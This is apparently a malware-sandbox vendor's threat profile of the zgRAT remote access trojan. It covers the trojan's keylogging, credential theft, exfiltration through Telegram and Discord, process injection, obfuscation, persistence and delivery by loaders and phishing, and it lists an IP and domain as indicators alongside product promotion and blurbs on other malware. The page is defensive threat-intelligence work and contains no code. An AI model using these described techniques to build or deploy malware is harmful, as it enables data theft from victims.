Black friday Up to 3 extra licenses FOR FREE + Special offer for TI LOOKUP Get it now

zgRAT

105
Global rank
90 infographic chevron month
Month rank
64 infographic chevron week
Week rank
0
IOCs

zgRAT is a malware known for its ability to infect systems and exfiltrate sensitive data to command-and-control (C2) servers. It is primarily distributed through loader malware, as well as phishing emails. zgRAT employs various advanced techniques, including process injection and code obfuscation, to evade detection and maintain persistence on infected systems. The malware can also spread via USB drives and uses popular messaging platforms like Telegram and Discord for data exfiltration.

RAT
Type
Unknown
Origin
1 April, 2021
First seen
11 February, 2025
Last seen

How to analyze zgRAT with ANY.RUN

RAT
Type
Unknown
Origin
1 April, 2021
First seen
11 February, 2025
Last seen

IOCs

IP addresses
94.156.105.136
Domains
cornpop.cloudns.be
Last Seen at
Last Seen at

Recent blog posts

post image
I Used a Sandbox to Strengthen Bank’s Securit...
watchers 53
comments 0
post image
Instant URL Analysis: Use Safebrowsing via AN...
watchers 559
comments 0
post image
Cyber Attacks on DeepSeek AI: What Really Hap...
watchers 1430
comments 0

What is zgRAT malware?

zgRAT, a remote access trojan (RAT), has been active in the cybersecurity landscape since its launch in 2021. This malware is designed to infect systems, collect sensitive data, and exfiltrate the stolen information to command-and-control (C2) servers.

zgRAT is primarily distributed through loader malware such as PrivateLoader and SmokeLoader, which act as delivery mechanisms for the RAT. Interestingly, researchers have noted that some samples of zgRAT can be mistaken for PureCrypter due to shared code elements.

With ANY.RUN’s Interactive Sandbox, we can safely execute a zgRAT malware and analyze its behavior on an actual live system.

zgRAT analysis inside ANY.RUN Sandbox Analysis of a malicious zgRAT process inside the ANY.RUN sandbox

As observed in this sandbox session, the threat dropped is immediately detected after attempting to gain foothold on the machine.

Get started today for free

Analyze malware and phishing in a fully-interactive sandbox

Create free account

zgRAT malware technical details

zgRAT is equipped with advanced capabilities to perform malicious activities on the infected machines, including:

  • Keylogging: zgRAT can record every keystroke, capturing information like usernames, passwords, and financial data, which is then sent to attackers.
  • Stealing of sensitive data: The malware scans infected systems for valuable information, including browser credentials, which it exfiltrates to C2 servers.
  • Dropping additional malware: zgRAT can download and install other malicious software, further compromising the security of the infected device.
  • Worm-like behavior: zgRAT can spread through USB drives, automatically executing and infecting new devices when connected.
  • Exfiltration via Telegram and Discord: The malware uses popular messaging platforms like Telegram and Discord for data exfiltration, bypassing traditional security measures and making detection more difficult.
  • Process Injection: zgRAT employs process injection to evade detection, injecting its malicious code into legitimate processes to operate stealthily and persist on infected systems.
  • Use of scripts: The malware utilizes scripts embedded in various file types to download its payload, making it easier to bypass security measures and gain a foothold on target devices.
  • Code obfuscation: zgRAT uses code obfuscation techniques to modify its code, making it harder for security software to analyze and identify, allowing it to remain undetected for longer periods.

Analysis of zgRAT Execution Process

Use ANY.RUN’s Interactive Sandbox to analyze malicious files and URLs. Check out this analysis of a zgRAT sample.

zgRAT analysis inside ANY.RUN Sandbox Analysis of a zgRAT sample inside the ANY.RUN sandbox

zgRAT is often spread through phishing emails containing malicious attachments like Windows Shortcut (LNK) files or Batch scripts (BAT). Opening these attachments triggers a script that drops additional payloads onto the system. The initial script may download and execute a malicious executable, continuing the infection process.

zgRAT analysis inside ANY.RUN Sandbox Process graph of a zgRAT execution chain demonstrated by the ANY.RUN sandbox

To evade detection, zgRAT uses obfuscation techniques such as packing, dynamic code generation, and XOR encryption. It also employs anti-tampering protections similar to ConfuserEx and loads extra DLLs to execute obfuscated methods. The malware complicates static analysis by making dynamic function calls via randomly named wrapper methods.

For persistence, zgRAT modifies registry entries or creates scheduled tasks to run automatically on startup. It creates mutexes to prevent multiple instances and communicates with a command and control (C2) server, allowing attackers to send commands and exfiltrate data. zgRAT can steal sensitive information through keylogging and screen capturing, and as a Remote Access Trojan (RAT), it enables remote control of infected machines, command execution, and file manipulation without user consent.

Use ANY.RUN free for 14 days

Try the full power of interactive analysis

Start your free trial

zgRAT distribution methods

One of the most common techniques for distributing zgRAT is through phishing emails, which trick users into downloading and executing malicious attachments or clicking on links that lead to the download of malware.

zgRAT is frequently dropped by loader malware that act as intermediaries, ensuring that zgRAT is delivered efficiently to infected systems. Some loaders have also been observed using malvertising techniques, particularly through Google Ads. Malvertising involves malicious advertisements that, when clicked, redirect users to websites that download and install malicious software.

Collecting zgRAT Threat Intelligence

Threat Intelligence Lookup helps security professionals keep up with the latest samples and indicators of zgRAT.

The service provides access to a extensive database containing insights from millions of malware analysis sessions conducted in the ANY.RUN sandbox. With over 40 search parameters, users can find specific data related to threats, including IP addresses, domains, file names, process artifacts, mutexes, etc.

zgRAT results in ANY.RUN's TI Lookup TI Lookup provides a list of sandbox sessions featuring zgRAT malware

For instance, important context on zgRAT can be searched by with the query like threatName:"zgRAT". This will return all related samples and sandbox results relevant to this remote access trojan.

Integrate ANY.RUN’s threat intelligence solutions in your company

Contact us

Conclusion

zgRAT malware represents a significant threat to businesses, with its advanced capabilities and sophisticated distribution methods. Its ability to steal sensitive data, spread via USB drives, and exfiltrate information through popular messaging platforms makes it a serious security concern.

To ensure proactive identification of malicious content, use ANY.RUN’s Interactive Sandbox that lets you quickly run analysis of any file and URL to determine if it poses a risk.

Sign up for a free ANY.RUN account to access unlimited cyber threat analysis →

HAVE A LOOK AT

BlackMoon screenshot
BlackMoon
blackmoon
BlackMoon also known as KrBanker is a trojan aimed at stealing payment credentials. It specializes in man-in-the-browser (MitB) attacks, web injection, and credential theft to compromise users' online banking accounts. It was first noticed in early 2014 attacking banks in South Korea and has impressively evolved since by adding a number of new infiltration techniques and information stealing methods.
Read More
Lumma screenshot
Lumma
lumma
Lumma is an information stealer, developed using the C programming language. It is offered for sale as a malware-as-a-service, with several plans available. It usually targets cryptocurrency wallets, login credentials, and other sensitive information on a compromised system. The malicious software regularly gets updates that improve and expand its functionality, making it a serious stealer threat.
Read More
Cobalt Strike screenshot
Cobalt Strike
cobaltstrike
Cobalt Strike is a legitimate penetration software toolkit developed by Forta. But its cracked versions are widely adopted by bad actors, who use it as a C2 system of choice for targeted attacks.
Read More
Black Basta screenshot
Black Basta
blackbasta
Black Basta is a ransomware-as-a-service operated by Storm-1811. It emerged in 2022 and uses double extortion tactics, encrypting data and stealing it for ransom. The malware often gains access through spear-phishing and uses tools like QakBot and Cobalt Strike. It's known for exploiting system vulnerabilities and using advanced obfuscation techniques.
Read More
Razr screenshot
Razr
razr
Razr is a destructive ransomware that infiltrates systems to encrypt files, rendering them inaccessible to users. It appends the ".razr" extension to the encrypted files and drops a ransom note, typically named "README.txt," instructing victims on how to pay the ransom to obtain the decryption key. The malware often spreads through phishing emails with malicious attachments or by exploiting vulnerabilities in software and operating systems. Razr employs strong encryption algorithms, making it challenging to decrypt files without the attackers' key.
Read More
SSLoad screenshot
SSLoad
ssload
SSLoad is a malicious loader or downloader that is used to infiltrate target systems through phishing emails, perform reconnaissance and transmit it back to its operators delivering malicious payloads. To avoid detection, SSLoad employs various encryption methods and delivery techniques highlighting its versatile nature and complexity. It is believed to be a part of Malware-as-a-Service (MaaS) operation given its diverse delivery methods and implemented techniques.
Read More